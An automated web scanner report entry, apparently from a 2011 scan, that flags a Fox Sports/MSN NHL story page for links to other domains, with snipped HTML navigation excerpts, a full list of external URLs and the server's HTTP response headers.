                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/nba-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">


                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/golf-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">


                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">

                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://redacted" class="out-link msn sprite" title="go to redacted"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.redacted/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.redacted/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.redacted/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.redacted/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.redacted/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.redacted/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.redacted/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.redacted/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.redacted/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers & Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://money.msn.com/investing" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://money.msn.com/personal-finance" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.redacted/" title="Real Estate & Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://money.msn.com/money-video" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.redacted/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.redacted/your-look/" title="Beauty & Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/your-home/" title="Decor & Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.redacted/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/relationships/" title="Love & Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps & Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers & Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.redacted/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections & Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.redacted/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.redacted/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.redacted/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.redacted" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link" title="Bing">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportswisconsin.com/msn/01/27/11/Dance-the-Raji/landing.html?blockID=399089&feedID=5059' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Dance party');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Dance party') });location.href=this.href;">
<div id="blurb_0" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/msn/01/28/11/Lack-of-trust-not-lack-of-Bosh-hurts-mos/landing_reiter.html?blockID=399356&feedID=7926' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Not a pretty sight');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Not a pretty sight') });location.href=this.href;">
<div id="blurb_1" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportstennessee.com/msn/01/27/11/Fisher-and-the-Future/landing_titans.html?blockID=399272&feedID=3732' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Rare breed');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Rare breed') });location.href=this.href;">
<div id="blurb_2" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/01/26/11/Heat-are-finding-times-finally-on-their-/landing_reiter.html?blockID=398033&feedID=7926' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Down time');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Down time') });location.href=this.href;">
<div id="blurb_8" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsdetroit.com/01/26/11/MSU-Insider-Spartans-down-not-necessaril/landing.html?blockID=398109&feedID=3701' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Fly away');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Fly away') });location.href=this.href;">
<div id="blurb_11" align="left" class="blurb">
...[SNIP]...
<div class="fs-tune-in">


           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>

<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=4f106944-1cfe-48f1-a72b-63a31c206d93&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=4f106944-1cfe-48f1-a72b-63a31c206d93&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=07820735-2940-48f9-aced-02c46e9a76b5&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=07820735-2940-48f9-aced-02c46e9a76b5&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<div class="body">
<a title="Video: Who makes the tastiest frozen pizza?" class="main-story" href="http://www.bing.com/videos/watch/video/tastiest-frozen-pizza/q94x07p0?q=Pizza&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr4-1"><img alt="Frozen Pizza, c. Rubberball - Mike Kemp - Getty Images" border="0" height="90" width="90" src="http://blstb.redacted/i/59/A38490AFABAE7E3D494E8243D8FE6.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Bing: Air Force sex conviction" href="http://www.bing.com/search?q=air+force+chief+convicted+sexual+harassment&form=MSNXNM&ocid=xnetr4-2">Bing: Air Force sex conviction</a>
...[SNIP]...
<li>
<a title="PETA's new naked celeb" href="http://specials.msn.com/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762&form=MSNXNM&ocid=xnetr4-3">PETA's new naked celeb</a>
...[SNIP]...
<li>
<a title="What's playing at the movies?" href="http://www.bing.com/entertainment/movies?form=MSNXNM&ocid=xnetr4-4">What's playing at the movies?</a>
...[SNIP]...
</div>

<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3>
                   <a href="http://www.ticketsnow.com/nhl-tickets/" target="_blank" title="NHL Tickets">NHL Tickets</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<h3>
                   <a href="http://www.newscorp.com" title="News Corp.">News Corp.</a>
...[SNIP]...
<h3>
                   <a href="http://www.fox.com" title="FOX">FOX</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<h3>
                   <a href="http://www.fxnetworks.com" title="FX">FX</a>
...[SNIP]...
<h3>
                   <a href="http://www.speedtv.com" title="Speed TV">Speed TV</a>
...[SNIP]...
<h3>
                   <a href="http://www.fuel.tv" title="NCAAFuel TV">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.redacted/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.redacted/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.redacted/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...

22.240. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The page was loaded from a URL containing a query string:

http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/?GT1=39002

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/home/home.asp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://b.scorecardresearch.com/beacon.js
http://blstb.redacted/i/59/A38490AFABAE7E3D494E8243D8FE6.jpg
http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://careers.redacted/
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://fitbie.redacted/
http://foxsoccer.tv/
http://foxsports.seenon.com/
http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav
http://foxsports.seenon.com/?ecid=PRF-SM-500012&PA=FoxSportNav2
http://foxsports.seenon.com/?v=fox-sports_mlb
http://foxsports.seenon.com/?v=fox-sports_nascar
http://foxsports.seenon.com/?v=fox-sports_nba
http://foxsports.seenon.com/?v=fox-sports_ncaa
http://foxsports.seenon.com/?v=fox-sports_nhl
http://foxsports.seenon.com/?v=foxsports-nfl
http://fsr-pr.clearchannel.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://games.redacted/
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://img5.catalog.video.redacted/image.aspx?uuid=07820735-2940-48f9-aced-02c46e9a76b5&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=4f106944-1cfe-48f1-a72b-63a31c206d93&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&w=136&h=102
http://img5.catalog.video.redacted/image.aspx?uuid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&w=136&h=102
http://insidefights.com/
http://insidemsn.wordpress.com/
http://investing.money.redacted/investments/stock-price
http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8
http://lifestyle.redacted/default.aspx
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://money.redacted/investing
http://money.redacted/money-video
http://money.redacted/personal-finance
http://moneycentral.msn.com/home.asp
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://redacted/
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://realestate.redacted/
http://rss.redacted/
http://s7.addthis.com/js/152/addthis_widget.js
http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762&form=MSNXNM&ocid=xnetr4-3
http://specials.redacted/alphabet.aspx
http://surveys2.researchresults.com/192/0030/1920030.htm?l=1
http://thebubble.redacted/
http://tv.redacted/
http://wonderwall.redacted/
http://www.baseballamerica.com/
http://www.bing.com/entertainment/movies?form=MSNXNM&ocid=xnetr4-4
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=FOXSP
http://www.bing.com/search?q=air+force+chief+convicted+sexual+harassment&form=MSNXNM&ocid=xnetr4-2
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/tastiest-frozen-pizza/q94x07p0?q=Pizza&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr4-1
http://www.delish.com/
http://www.fox.com/
http://www.foxcareers.com/
http://www.foxdeportes.com/
http://www.foxnews.com/
http://www.foxsportsarizona.com/
http://www.foxsportscarolinas.com/
http://www.foxsportsdetroit.com/
http://www.foxsportsflorida.com/
http://www.foxsportsflorida.com/msn/01/28/11/Lack-of-trust-not-lack-of-Bosh-hurts-mos/landing_reiter.html?blockID=399356&feedID=7926
http://www.foxsportsflorida.com/msn/01/29/11/Nations-coolest-cities-have-many-of-NBAs/landing_reiter.html?blockID=400120&feedID=3722
http://www.foxsportshouston.com/
http://www.foxsportskansascity.com/
http://www.foxsportsmidwest.com/
http://www.foxsportsnorth.com/
http://www.foxsportsohio.com/
http://www.foxsportssouth.com/
http://www.foxsportssouthwest.com/
http://www.foxsportssupports.com/
http://www.foxsportstennessee.com/
http://www.foxsportstennessee.com/msn/01/27/11/Fisher-and-the-Future/landing_titans.html?blockID=399272&feedID=3732
http://www.foxsportswest.com/
http://www.foxsportswisconsin.com/
http://www.foxsportswisconsin.com/msn/01/27/11/Dance-the-Raji/landing.html?blockID=399089&feedID=5059
http://www.foxsportswisconsin.com/msn/01/28/11/Lessons-learned-from-last-Steelers-game/landing.html?blockID=399673&feedID=5059
http://www.fuel.tv/
http://www.fxnetworks.com/
http://www.golfweek.com/
http://www.heavy.com/mma/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.nesn.com/
http://www.newscorp.com/
http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar
http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596
http://www.scenedaily.com/
http://www.scout.com/
http://www.speed.com/
http://www.speedtv.com/
http://www.thefightnetwork.com/
http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068
http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068
http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068
http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068
http://www.ticketsnow.com/golf-tickets/?partnerCode=16068
http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068
http://www.ticketsnow.com/nba-tickets/?partnerCode=16068
http://www.ticketsnow.com/nhl-tickets/
http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068
http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068
http://www.tvg.com/special/FoxSportsJumpPage_final.htm
http://www.whatifsports.com/
http://www.yardbarker.com/rumors
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250970
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=25
Date: Sun, 30 Jan 2011 16:53:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

